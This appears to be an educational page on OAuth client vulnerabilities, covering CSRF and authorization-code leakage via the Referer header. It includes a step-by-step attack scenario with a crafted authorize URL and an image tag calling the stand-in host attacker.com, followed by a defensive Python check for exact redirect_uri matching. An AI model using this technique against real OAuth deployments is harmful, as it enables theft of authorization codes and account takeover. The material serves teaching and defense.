Client Vulnerabilities

The purpose of this section is to describe common vulnerabilities found in OAuth Client implementations.

  • Cross-Site Request Forgery

    • Results in the Resource Owner's session in the Client application being connected to the Attacker's authorization context instead of the Resource Owner's own.

      • See the following challenge for a proof of concept.

  • Authorization Code Leakage via Referer HTTP Header

    • This attack scenario is somewhat contrived, as several conditions must hold for it to succeed.

      • 1) The Authorization Server validates the Client's redirect_uri loosely, checking only that the host (subdomain) matches, e.g. when https://my-client.com/oauth/callback is registered, any URL under https://my-client.com/* is still accepted.

      • 2) The attacker must be able to create a page on the target (Client) site that hosts attacker-supplied HTML content; in particular, they need to be able to embed an image that points to a third-party site, e.g. <img src='http://attacker.com'>.

        • Think of blogging software or similar applications that include WYSIWYG editors allowing users to embed images hosted on a third-party website.

      • 3) The Attacker sends the Victim a link that initiates the OAuth flow with the redirect_uri pointing back to the attacker-controlled sub-page, e.g. https://oauthprovider.com/authorize?response_type=code&client_id=abc&scope=blabla&redirect_uri=https://my-client.com/usergeneratedcontent/attacker.html

      • 4) The Victim clicks the link and the OAuth flow eventually lands on the following URL, with the code in the query string: https://my-client.com/usergeneratedcontent/attacker.html?code=access_token

      • 5) The URL above may not seem dangerous, as the Attacker may not have access to the Client's server-side logs. However, when the browser loads the image embedded in the attacker-controlled page, the current URL (query string included) is sent to attacker.com in the Referer HTTP header, thus leaking the authorization code.
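The enabling weakness in step 1 is host-only matching of redirect_uri. The following is an added example (not code from the original page or from any real authorization server) that puts that loose check beside the exact-match check RFC 6749 requires, and evaluates the page's own attacker-crafted authorize URL against both; the client registration for client_id "abc" is a constructed assumption.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample registration (hypothetical): the client "abc" from the
# page's example URL has registered exactly one complete callback URI.
REGISTERED_REDIRECT_URIS = {
    "abc": {"https://my-client.com/oauth/callback"},
}


def loose_redirect_uri_check(client_id: str, redirect_uri: str) -> bool:
    """The weak validation from step 1: only scheme and host are compared, so
    any path on the client's host, including user-generated content, passes."""
    cand = urlsplit(redirect_uri)
    for registered in REGISTERED_REDIRECT_URIS.get(client_id, ()):
        reg = urlsplit(registered)
        if (cand.scheme, cand.hostname) == (reg.scheme, reg.hostname):
            return True
    return False


def strict_redirect_uri_check(client_id: str, redirect_uri: str) -> bool:
    """Simple string comparison against the registered URIs, as RFC 6749
    section 3.1.2.2 requires: no prefix, wildcard or host-only matching."""
    return redirect_uri in REGISTERED_REDIRECT_URIS.get(client_id, set())


def authorize_decision(authorize_url: str, strict: bool = True) -> str:
    """Inspect the redirect_uri of an /authorize request and return 'redirect'
    (issue the code to that URI) or 'error' (render an error page and do NOT
    redirect, since redirecting to an unvalidated URI is what leaks the code)."""
    query = parse_qs(urlsplit(authorize_url).query)
    client_id = query.get("client_id", [""])[0]
    redirect_uri = query.get("redirect_uri", [""])[0]
    check = strict_redirect_uri_check if strict else loose_redirect_uri_check
    return "redirect" if check(client_id, redirect_uri) else "error"


# The attacker-crafted link from step 3 of the page, and a legitimate request.
ATTACK_URL = (
    "https://oauthprovider.com/authorize?response_type=code&client_id=abc"
    "&scope=blabla&redirect_uri=https://my-client.com/usergeneratedcontent/attacker.html"
)
LEGIT_URL = (
    "https://oauthprovider.com/authorize?response_type=code&client_id=abc"
    "&scope=blabla&redirect_uri=https://my-client.com/oauth/callback"
)

if __name__ == "__main__":
    print("loose  :", authorize_decision(ATTACK_URL, strict=False))  # redirect
    print("strict :", authorize_decision(ATTACK_URL, strict=True))   # error
    print("strict :", authorize_decision(LEGIT_URL, strict=True))    # redirect
```

Note that the strict check also rejects near-misses such as a trailing slash or a different scheme, which is intended: the client must register every callback URI it uses in full.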
